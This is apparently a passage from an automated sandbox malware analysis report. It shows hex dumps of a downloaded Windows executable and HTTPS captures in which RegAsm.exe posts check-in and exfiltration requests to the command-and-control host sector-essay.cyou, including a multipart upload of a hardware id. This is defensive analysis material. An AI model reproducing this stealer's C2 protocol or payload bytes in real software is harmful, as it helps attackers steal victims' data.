                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 a2 bf 37 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 ba 00 00 00 00 00 00 70 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cd 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 05 00 24 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 3d [TRUNCATED]
                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL7gp@@;`$==.textp `.rdata "@@.datalPX6@.CRTP@@.reloc$=`>@B
                        Nov 24, 2024 08:35:35.318114042 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]Sut%E.]SuEu
                        Nov 24, 2024 08:35:35.318150997 CET1236INData Raw: c4 04 85 c0 0f 84 61 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 45 02 00 00 c7 45 08 00 00 00 00 55 e9 01 01 00 00 89 c7 8b 5c 24 14 50 e8 cd 70 00 00 83 c4 04 39 c3 0f 85 6a 02 00 00 8b 1e 0f b6 2b 55 e8 67
                        Data Ascii: a@HEEU\$Pp9j+UgqtC+UTqCuK<:5Ct$V@PWt$&.]SqtE.]SpEuM,E.]S
                        Nov 24, 2024 08:35:35.318185091 CET1236INData Raw: cc cc cc cc cc cc cc cc 53 57 56 8b 7c 24 10 31 f6 85 ff 74 29 8b 5c 24 14 85 db 74 21 53 e8 15 6c 00 00 83 c4 04 50 53 57 e8 1a fe ff ff 83 c4 0c 85 c0 74 09 83 78 04 05 75 03 8b 70 08 89 f0 5e 5f 5b c3 cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09
                        Data Ascii: SWV|$1t)\$t!SlPSWtxup^_[L$1tyuASWV|$t)\$t!SkPSWtxup^_[SWV\$|$j.Skt:Cj.Skt )PSW`1tx
                        Nov 24, 2024 08:35:35.318218946 CET1236INData Raw: 24 0c 8b 44 24 08 8b 04 a8 83 f8 ff 0f 84 3b ff ff ff 8b 51 08 39 1c 82 75 da 8b 49 0c 8b 2c 81 55 e8 3e 67 00 00 8b 4c 24 28 83 c4 04 3b 04 24 75 c2 ff 34 24 55 ff 74 24 30 e8 45 67 00 00 8b 4c 24 30 83 c4 0c 85 c0 75 aa b8 ff ff ff ff e9 7a ff
                        Data Ascii: $D$;Q9uI,U>gL$(;$u4$Ut$0EgL$0uzD$QT$<GGN#l$D$Q9uID$PfL$(;$u4$t$t$0fL$0uUSWV0L$(Y
                        Nov 24, 2024 08:35:35.318252087 CET1236INData Raw: 24 0f 0c e0 88 06 89 d1 c1 e9 06 89 c8 f7 d0 83 c8 3f 01 c8 fe c0 0c 80 88 46 01 80 e2 3f 80 ca 80 88 56 02 83 c6 02 b8 01 00 00 00 01 c7 83 c7 03 e9 36 ff ff ff 81 fa ff db 00 00 0f 87 e9 00 00 00 80 7d 06 5c 0f 85 df 00 00 00 80 7d 07 75 0f 85
                        Data Ascii: $?F?V6}\}uT$D$==)))?N?N$?F}+
                        Nov 24, 2024 08:35:35.318288088 CET1236INData Raw: e8 87 5c 00 00 83 c4 04 c3 cc cc cc 8b 44 24 10 0f af 44 24 0c 50 ff 74 24 0c e8 7d 5c 00 00 83 c4 08 c3 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 4c 24 24 8b 44 24 1c 8b 74 24 14 85 f6 74 26 8b 5c 24 28 8b 54 24 20 8b 7c 24 18 89 7e 70 89 46 78
                        Data Ascii: \D$D$Pt$}\USWVL$$D$t$t&\$(T$ |$~pFxVtN|t(tte]1>0u~lunh|$(t)t%ttFl^_[]tu8ut
                        Nov 24, 2024 08:35:35.318320990 CET1236INData Raw: 18 8b 74 24 10 0f 84 ed 00 00 00 39 5c 24 08 0f 84 b3 00 00 00 0f b6 0c 1a 8b 45 1c 01 de 8d 3c 06 81 e7 ff 7f 00 00 88 8c 3d 90 00 00 00 81 ff 00 01 00 00 77 07 88 8c 3d 90 80 00 00 8b 7c 24 10 01 df 47 89 7d 20 8b 7c 24 24 01 df 83 ff 03 72 a6
                        Data Ascii: t$9\$E<=w=|$G} |$$rL$ ,0MT$T*1|$T1zrfJrT$l$Tf}r<+l$9rD$Th$)\$\$U
                        Nov 24, 2024 08:35:35.318355083 CET1236INData Raw: 4d 92 81 00 00 3d 80 00 00 00 0f 82 3a 01 00 00 8b 4d 28 8b 55 3c 89 d6 21 c6 31 c2 8d 14 72 89 55 3c 89 c2 80 c2 fd 88 11 8b 54 24 08 4a 8b 4d 28 88 51 01 89 d7 89 d1 c1 e9 08 8b 55 28 88 4a 02 83 45 28 03 8b 55 2c 0f b6 1a d0 eb 80 cb 80 88 1a
                        Data Ascii: M=:M(U<!1rU<T$JM(QU(JE(U,M82Ej+DEE8U(ru(U,=%j)DT$L$fE+DfEEPHEP|$}"M(U<!
                        Nov 24, 2024 08:35:35.318392038 CET1236INData Raw: 7f 7f 66 83 f8 20 0f 87 3d 05 00 00 bb 00 78 00 00 ff 24 85 c4 31 44 00 bb 40 78 00 00 e9 33 05 00 00 85 c0 74 68 c7 46 44 08 00 00 00 b9 08 00 00 00 eb 1d 90 90 90 90 90 90 90 90 90 90 90 90 c1 ea 08 89 56 48 83 c1 f8 89 4e 44 83 f9 07 76 3f 8b
                        Data Ascii: f =x$1D@x3thFDVHNDv?F0;F4sHN0NDVH===x1F<FHND'FH)NDvV0;V4sJN0NDFH3V<V<
                        Nov 24, 2024 08:35:35.438220024 CET1236INData Raw: 46 48 83 c2 f8 89 56 44 83 fa 07 0f 86 da fd ff ff 8b 4e 30 3b 4e 34 73 e3 8d 51 01 89 56 30 88 01 8b 56 44 8b 46 48 eb d3 8b 56 7c 8b 8e 8c 00 00 00 8b 2a 29 cd 89 df 39 eb 72 02 89 ef 03 4e 74 57 50 51 e8 13 49 00 00 83 c4 0c 01 be 8c 00 00 00
                        Data Ascii: FHVDN0;N4sQV0VDFHV|*)9rNtWPQI9v)~X^\F\^_[]=t=xxiB)NDx>FHFHNDr`^HND"^HND/F


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549705104.21.47.1364436392C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-11-24 07:35:38 UTC264OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: sector-essay.cyou
                        2024-11-24 07:35:38 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                        Data Ascii: act=life
                        2024-11-24 07:35:39 UTC1014INHTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=s9883k7topelmfp6eurmt20631; expires=Thu, 20-Mar-2025 01:22:18 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D7axALczaFQyHOhiVpeop0GII0L%2BPmERo772FuW9iIIl8BWem3bPIW0gXknobtOmAsQC0hXy1rs%2BCeRymbWbnCnoBbVtWcyStMerADoi0cK%2Bcv1oNVkewGK76n5ziNGgZCbWJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b9340ab542c7-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1576&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4228&recv_bytes=908&delivery_rate=291650&cwnd=252&unsent_bytes=0&cid=6f7e642359f1798e&ts=718&x=0"
                        2024-11-24 07:35:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                        Data Ascii: 2ok
                        2024-11-24 07:35:39 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549706104.21.47.1364436392C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-11-24 07:35:40 UTC265OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 52
                        Host: sector-essay.cyou
                        2024-11-24 07:35:40 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d
                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6928154717&j=
                        2024-11-24 07:35:41 UTC1019INHTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=130kq5jlpbgsh1b3aag3dq53k6; expires=Thu, 20-Mar-2025 01:22:20 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V8WTTw%2BLVgTUOH5N5GVFK4vmQusryTI%2FSk%2B0wqr7V55gw7ugNuqS27dYpPMAk4OMpr8aein1ggW2SS%2FqlmdkHjxBeniBAnVBlGoO8F5TEHGGU5lpyurnFeqs%2BU5m99iT7foPYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8e77b9416f4ac3ee-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=953&delivery_rate=1923583&cwnd=246&unsent_bytes=0&cid=34c1544a90916fb0&ts=715&x=0"
                        2024-11-24 07:35:41 UTC350INData Raw: 32 35 38 61 0d 0a 47 43 64 2f 78 35 6a 4d 66 43 35 33 57 58 55 5a 58 74 69 75 50 43 63 45 78 7a 48 45 36 4f 7a 6c 70 73 76 63 2b 79 39 35 31 56 52 6a 42 51 6e 6c 6f 76 68 51 44 41 51 38 56 79 4d 71 71 74 74 5a 43 79 61 6d 56 65 62 53 69 6f 54 4b 75 4c 6e 58 44 51 2b 34 64 69 4a 42 48 71 76 72 71 56 41 4d 45 69 46 58 49 77 57 6a 6a 46 6c 4a 4a 76 30 54 6f 59 4b 4f 68 4d 71 70 76 5a 42 41 43 62 6b 33 63 45 73 59 72 2f 32 76 47 45 38 62 4e 42 42 38 4f 37 6e 45 55 6b 35 70 72 31 7a 6d 78 4d 36 41 33 4f 6e 6d 32 57 49 63 6f 54 56 56 52 67 79 73 75 72 46 51 56 56 55 38 47 7a 74 6b 2b 73 39 5a 52 57 69 68 56 61 2b 41 68 49 33 43 71 4c 69 52 58 78 43 7a 50 48 42 46 47 36 37 33 70 67 78 43 45 54 4d 62 65 6a 47 35 6a 42 41 46 59 62 30 54 2f 73 72 64 74 63 65 34 72
                        Data Ascii: 258aGCd/x5jMfC53WXUZXtiuPCcExzHE6Ozlpsvc+y951VRjBQnlovhQDAQ8VyMqqttZCyamVebSioTKuLnXDQ+4diJBHqvrqVAMEiFXIwWjjFlJJv0ToYKOhMqpvZBACbk3cEsYr/2vGE8bNBB8O7nEUk5pr1zmxM6A3Onm2WIcoTVVRgysurFQVVU8Gztk+s9ZRWihVa+AhI3CqLiRXxCzPHBFG673pgxCETMbejG5jBAFYb0T/srdtce4r
                        2024-11-24 07:35:41 UTC1369INData Raw: 47 36 76 37 6f 78 35 65 48 54 41 63 66 69 36 78 78 56 4e 49 5a 71 68 5a 71 59 6d 4f 67 4d 36 6a 73 5a 4e 4a 46 72 6f 77 65 6b 56 64 36 37 71 70 42 67 78 4e 65 7a 52 2b 4c 4c 33 41 53 41 64 63 35 55 7a 6f 6b 38 36 41 79 4f 6e 6d 32 55 55 65 74 44 56 78 53 68 36 74 38 62 77 65 58 68 4d 32 45 6d 6b 36 76 38 4a 55 52 6e 53 76 58 61 43 4a 68 34 7a 4e 72 4c 6d 64 44 56 58 33 4d 57 49 46 52 65 58 62 6f 78 56 41 48 79 77 58 4f 79 50 30 31 52 35 43 61 75 55 4c 35 6f 36 50 67 38 57 74 73 4a 64 4a 46 37 45 34 64 30 6f 62 72 2f 71 70 46 45 51 64 4f 68 70 77 4d 37 72 4a 55 30 46 67 71 56 4b 6a 79 73 44 48 77 37 48 2b 77 51 30 31 73 44 56 6f 42 79 69 6d 39 4b 41 5a 57 6c 55 6b 57 57 4a 38 76 63 41 65 48 53 61 72 56 71 6d 59 6a 35 58 42 70 36 79 56 53 42 32 36 4e 58 52
                        Data Ascii: G6v7ox5eHTAcfi6xxVNIZqhZqYmOgM6jsZNJFrowekVd67qpBgxNezR+LL3ASAdc5Uzok86AyOnm2UUetDVxSh6t8bweXhM2Emk6v8JURnSvXaCJh4zNrLmdDVX3MWIFReXboxVAHywXOyP01R5CauUL5o6Pg8WtsJdJF7E4d0obr/qpFEQdOhpwM7rJU0FgqVKjysDHw7H+wQ01sDVoByim9KAZWlUkWWJ8vcAeHSarVqmYj5XBp6yVSB26NXR
                        2024-11-24 07:35:41 UTC1369INData Raw: 4b 41 5a 57 6c 55 6b 57 57 4a 38 76 63 41 65 48 53 61 70 57 71 61 42 68 49 50 45 72 72 4f 63 54 68 79 30 4f 33 31 50 45 36 4c 2b 6f 68 64 42 45 7a 73 51 66 7a 6d 6f 79 56 64 4a 61 75 55 64 35 6f 32 57 78 35 7a 70 6b 5a 35 62 47 4a 67 31 61 30 78 64 75 72 53 33 58 6b 73 5a 65 30 38 37 4f 37 2f 45 56 55 4e 75 70 55 47 6a 68 49 57 47 7a 71 2b 2f 6c 45 45 64 74 7a 64 36 51 78 47 6c 2f 61 6b 4d 58 68 41 39 42 58 46 38 39 49 78 5a 58 53 62 39 45 35 43 61 6d 5a 62 53 36 34 75 61 51 78 57 77 49 44 70 61 55 37 79 36 71 52 49 4d 54 58 73 63 65 7a 43 39 78 46 68 42 62 71 70 63 72 35 69 50 69 38 71 37 75 5a 6c 45 46 62 67 36 63 30 67 61 71 50 47 6b 45 30 67 53 4f 6c 63 31 66 4c 33 55 48 68 30 6d 6b 30 4f 72 68 71 43 4d 79 4b 44 2b 68 67 4d 43 39 7a 46 32 42 55 58 6c
                        Data Ascii: KAZWlUkWWJ8vcAeHSapWqaBhIPErrOcThy0O31PE6L+ohdBEzsQfzmoyVdJauUd5o2Wx5zpkZ5bGJg1a0xdurS3XksZe087O7/EVUNupUGjhIWGzq+/lEEdtzd6QxGl/akMXhA9BXF89IxZXSb9E5CamZbS64uaQxWwIDpaU7y6qRIMTXscezC9xFhBbqpcr5iPi8q7uZlEFbg6c0gaqPGkE0gSOlc1fL3UHh0mk0OrhqCMyKD+hgMC9zF2BUXl
                        2024-11-24 07:35:41 UTC1369INData Raw: 4d 55 50 78 4a 2b 4f 4c 33 49 57 45 6f 6d 36 78 4f 68 6b 73 37 66 68 49 61 5a 72 41 38 36 6a 58 5a 6c 43 77 54 6c 2f 61 4a 65 46 46 55 33 46 48 63 30 74 63 70 58 53 57 79 73 57 4b 71 42 69 6f 76 4e 72 4c 69 59 53 42 36 32 4d 6e 5a 50 47 36 62 35 6f 52 46 44 48 58 74 5a 4f 7a 75 69 6a 41 59 46 51 37 4a 59 71 49 7a 4f 6d 49 71 77 2f 70 35 42 57 2b 39 32 64 6b 77 62 6f 2f 2b 69 48 30 6f 64 50 68 39 2f 50 62 7a 4b 58 55 70 69 6f 46 4b 70 6a 6f 4b 4a 7a 71 69 2f 6c 55 59 55 76 44 4d 36 43 31 32 69 34 75 35 47 44 43 51 34 41 57 77 73 74 6f 78 42 43 33 2f 6c 56 4b 72 4b 31 73 66 46 75 37 53 54 51 78 36 34 4d 33 6c 4b 47 71 6a 38 6f 68 52 46 48 54 30 59 63 69 36 35 77 46 42 43 61 4b 6c 64 71 34 43 4e 69 6f 54 6e 2f 70 35 56 57 2b 39 32 56 6b 49 51 69 2f 47 69 47
                        Data Ascii: MUPxJ+OL3IWEom6xOhks7fhIaZrA86jXZlCwTl/aJeFFU3FHc0tcpXSWysWKqBiovNrLiYSB62MnZPG6b5oRFDHXtZOzuijAYFQ7JYqIzOmIqw/p5BW+92dkwbo/+iH0odPh9/PbzKXUpioFKpjoKJzqi/lUYUvDM6C12i4u5GDCQ4AWwstoxBC3/lVKrK1sfFu7STQx64M3lKGqj8ohRFHT0Yci65wFBCaKldq4CNioTn/p5VW+92VkIQi/GiG
                        2024-11-24 07:35:41 UTC1369INData Raw: 46 4f 33 4c 36 79 30 59 46 50 75 56 6c 6f 5a 71 65 68 49 61 59 71 4a 70 62 45 4c 6f 36 4f 6c 70 54 76 4c 71 70 45 67 78 4e 65 78 46 30 4e 62 6e 44 58 30 78 71 71 46 61 76 6a 34 2b 42 77 4b 4f 30 6d 55 73 64 74 6a 4e 77 52 68 79 76 38 36 6b 57 53 78 59 70 56 7a 56 38 76 64 51 65 48 53 61 4d 56 4c 53 45 6e 73 66 62 35 36 66 5a 53 68 66 33 62 6a 70 42 46 36 72 2b 71 52 4a 4b 45 44 30 61 65 6a 4f 37 7a 46 46 42 62 61 78 56 70 34 65 4c 69 73 43 37 74 4a 4a 43 46 37 34 36 64 77 56 54 35 66 32 32 58 68 52 56 43 68 70 31 4d 72 33 61 48 6c 6f 6f 76 42 4f 68 68 73 37 66 68 4b 69 79 6c 6b 34 55 74 44 56 37 54 77 2b 33 39 71 63 57 53 52 6b 77 47 58 30 75 76 4d 4e 58 52 6d 57 73 56 4b 36 47 68 49 54 44 36 66 44 5a 53 67 50 33 62 6a 70 6d 43 72 58 33 37 67 45 43 44 48
                        Data Ascii: FO3L6y0YFPuVloZqehIaYqJpbELo6OlpTvLqpEgxNexF0NbnDX0xqqFavj4+BwKO0mUsdtjNwRhyv86kWSxYpVzV8vdQeHSaMVLSEnsfb56fZShf3bjpBF6r+qRJKED0aejO7zFFBbaxVp4eLisC7tJJCF746dwVT5f22XhRVChp1Mr3aHloovBOhhs7fhKiylk4UtDV7Tw+39qcWSRkwGX0uvMNXRmWsVK6GhITD6fDZSgP3bjpmCrX37gECDH
                        2024-11-24 07:35:41 UTC1369INData Raw: 76 63 70 51 56 32 4f 6a 58 4b 6d 44 68 34 50 4d 71 72 36 64 53 52 79 79 4e 58 5a 4f 47 71 62 31 71 68 64 43 48 44 52 58 4e 58 79 39 31 42 34 64 4a 6f 52 49 70 59 61 44 78 39 76 6e 70 39 6c 4b 46 2f 64 75 4f 6b 6b 54 6f 50 71 6b 47 45 67 51 50 52 31 2b 50 4c 48 50 55 55 46 67 6f 56 79 6d 67 59 65 47 77 71 79 30 6b 6b 73 57 74 44 42 38 42 56 50 6c 2f 62 5a 65 46 46 55 62 44 48 59 77 76 59 78 42 43 33 2f 6c 56 4b 72 4b 31 73 66 50 70 62 71 65 54 52 61 30 50 6e 39 42 46 36 44 36 70 67 78 45 46 54 77 46 61 54 79 7a 79 56 4a 47 5a 71 46 56 72 34 79 4e 67 34 54 6e 2f 70 35 56 57 2b 39 32 56 30 6b 61 6a 50 32 31 58 6c 4e 62 49 6c 64 38 4d 50 71 55 48 6b 52 74 72 31 79 72 69 59 69 45 7a 36 79 30 6d 45 6f 54 75 69 52 35 53 68 4b 68 2b 71 45 59 53 68 51 30 45 58 77
                        Data Ascii: vcpQV2OjXKmDh4PMqr6dSRyyNXZOGqb1qhdCHDRXNXy91B4dJoRIpYaDx9vnp9lKF/duOkkToPqkGEgQPR1+PLHPUUFgoVymgYeGwqy0kksWtDB8BVPl/bZeFFUbDHYwvYxBC3/lVKrK1sfPpbqeTRa0Pn9BF6D6pgxEFTwFaTyzyVJGZqFVr4yNg4Tn/p5VW+92V0kajP21XlNbIld8MPqUHkRtr1yriYiEz6y0mEoTuiR5ShKh+qEYShQ0EXw
                        2024-11-24 07:35:41 UTC1369INData Raw: 45 59 68 6d 32 32 42 6e 49 53 41 31 4b 36 70 6c 67 31 56 39 7a 6b 36 48 53 54 6c 38 36 6b 46 58 51 4d 32 42 33 78 38 68 59 49 65 58 53 62 39 45 35 4f 4a 67 49 6e 44 76 36 2f 55 61 67 32 39 4d 57 70 43 43 71 71 36 34 46 35 4b 56 57 4e 45 4e 58 79 2b 33 52 34 64 4e 76 63 49 38 39 6e 5a 31 35 61 32 38 49 41 4e 44 66 64 75 4b 41 74 64 74 37 72 32 58 67 73 57 4b 51 56 39 50 36 7a 50 47 58 74 59 67 6b 6d 72 6a 4a 6d 57 2b 70 65 35 67 30 41 64 6f 43 63 32 55 42 36 72 39 4b 6b 49 44 46 74 37 47 44 74 6b 67 34 77 57 42 56 6e 72 45 37 37 4b 31 73 66 78 71 72 43 58 53 67 32 6d 65 31 31 66 45 4b 50 74 76 31 34 43 56 54 31 58 49 32 7a 30 6a 46 70 55 4a 76 30 44 39 4e 48 62 31 4a 50 35 37 49 59 44 41 76 63 67 4f 68 31 50 36 37 71 38 58 68 52 56 66 42 52 70 4c 72 7a 50
                        Data Ascii: EYhm22BnISA1K6plg1V9zk6HSTl86kFXQM2B3x8hYIeXSb9E5OJgInDv6/Uag29MWpCCqq64F5KVWNENXy+3R4dNvcI89nZ15a28IANDfduKAtdt7r2XgsWKQV9P6zPGXtYgkmrjJmW+pe5g0AdoCc2UB6r9KkIDFt7GDtkg4wWBVnrE77K1sfxqrCXSg2me11fEKPtv14CVT1XI2z0jFpUJv0D9NHb1JP57IYDAvcgOh1P67q8XhRVfBRpLrzP
                        2024-11-24 07:35:41 UTC1054INData Raw: 56 4c 35 74 4c 4f 73 73 65 6e 73 4a 35 62 43 76 6f 52 64 45 49 63 73 2b 71 35 45 51 78 62 65 78 45 37 5a 4f 69 43 48 6b 46 33 35 51 76 32 32 4e 58 53 6c 2f 37 75 79 31 4a 56 72 6e 5a 73 42 55 58 33 74 4f 34 4d 44 45 31 37 55 48 67 75 71 4d 70 64 55 32 58 69 62 5a 69 74 67 49 44 46 76 36 36 4f 51 6c 53 5a 41 46 74 37 49 37 44 35 6f 42 42 4c 41 79 70 58 4e 58 79 31 6a 41 5a 38 4a 75 30 54 6d 63 54 4f 6e 34 54 78 2f 71 78 4f 46 62 6b 78 62 46 52 51 67 76 53 70 48 31 6f 46 4c 42 67 30 45 6f 7a 74 48 67 73 6d 6f 78 50 2b 32 4d 44 48 77 4c 6a 2b 77 52 31 4a 37 47 4d 70 45 6b 33 33 35 65 41 48 44 41 4e 37 54 79 6c 79 2b 74 34 65 48 53 62 69 55 4c 53 59 69 49 54 53 71 76 6d 6e 63 7a 79 35 4d 58 74 54 44 61 6a 32 6a 78 31 64 48 77 55 70 62 6a 2b 30 77 6c 6c 54 64
                        Data Ascii: VL5tLOssensJ5bCvoRdEIcs+q5EQxbexE7ZOiCHkF35Qv22NXSl/7uy1JVrnZsBUX3tO4MDE17UHguqMpdU2XibZitgIDFv66OQlSZAFt7I7D5oBBLAypXNXy1jAZ8Ju0TmcTOn4Tx/qxOFbkxbFRQgvSpH1oFLBg0EoztHgsmoxP+2MDHwLj+wR1J7GMpEk335eAHDAN7Tyly+t4eHSbiULSYiITSqvmnczy5MXtTDaj2jx1dHwUpbj+0wllTd
                        2024-11-24 07:35:41 UTC1369INData Raw: 31 65 65 32 0d 0a 49 4d 65 77 45 37 5a 4f 6d 43 48 6c 63 6d 2f 52 50 68 68 49 4f 47 78 36 65 39 69 31 38 64 74 43 42 35 41 69 4f 62 33 36 4d 54 53 52 73 38 4b 55 55 64 73 4e 78 54 53 6d 48 6e 63 36 47 63 6a 62 6e 36 6e 71 2b 65 58 56 6d 52 4e 57 78 47 58 65 75 36 74 6c 34 55 56 52 6f 64 61 7a 47 31 79 78 78 6c 59 62 4e 51 35 73 54 4f 67 34 54 78 2f 72 78 41 46 72 49 34 66 51 63 38 72 2b 71 6a 45 55 74 58 47 78 42 74 50 2f 71 43 48 6b 6b 6d 2f 52 4f 6e 67 4a 36 4b 79 36 37 79 6e 6c 63 63 39 33 67 36 53 31 33 39 75 71 38 55 58 42 67 30 45 44 63 36 74 4d 49 65 57 69 69 38 45 37 44 4b 31 74 53 4b 36 61 7a 5a 46 56 76 77 4e 57 68 58 47 36 62 73 72 56 6c 79 4b 78 59 46 66 43 79 35 6a 6d 39 49 59 72 4e 47 70 5a 71 4a 75 66 71 45 72 4a 35 64 47 50 55 48 62 45 59
                        Data Ascii: 1ee2IMewE7ZOmCHlcm/RPhhIOGx6e9i18dtCB5AiOb36MTSRs8KUUdsNxTSmHnc6Gcjbn6nq+eXVmRNWxGXeu6tl4UVRodazG1yxxlYbNQ5sTOg4Tx/rxAFrI4fQc8r+qjEUtXGxBtP/qCHkkm/ROngJ6Ky67ynlcc93g6S139uq8UXBg0EDc6tMIeWii8E7DK1tSK6azZFVvwNWhXG6bsrVlyKxYFfCy5jm9IYrNGpZqJufqErJ5dGPUHbEY


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549707104.21.47.1364436392C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        2024-11-24 07:35:42 UTC273OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=BF8HSG09
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 12780
                        Host: sector-essay.cyou
                        2024-11-24 07:35:42 UTC12780OUTData Raw: 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 36 39 37 45 44 37 42 33 41 37 35 38 37 31 37 46 45 45 38 31 35 45 42 34 30 33 46 35 44 35 34 0d 0a 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 42 46 38 48 53 47 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                        Data Ascii: --BF8HSG09Content-Disposition: form-data; name="hwid"5697ED7B3A758717FEE815EB403F5D54--BF8HSG09Content-Disposition: form-data; name="pid"2--BF8HSG09Content-Disposition: form-data; name="lid"yau6Na--6928154717--BF8HSG09Content-Dis
                        2024-11-24 07:35:43 UTC1025INHTTP/1.1 200 OK
                        Date: Sun, 24 Nov 2024 07:35:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=6npuqheb793frp93jsch6tuhhk; expires=Thu, 20-Mar-2025 01:22:22 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
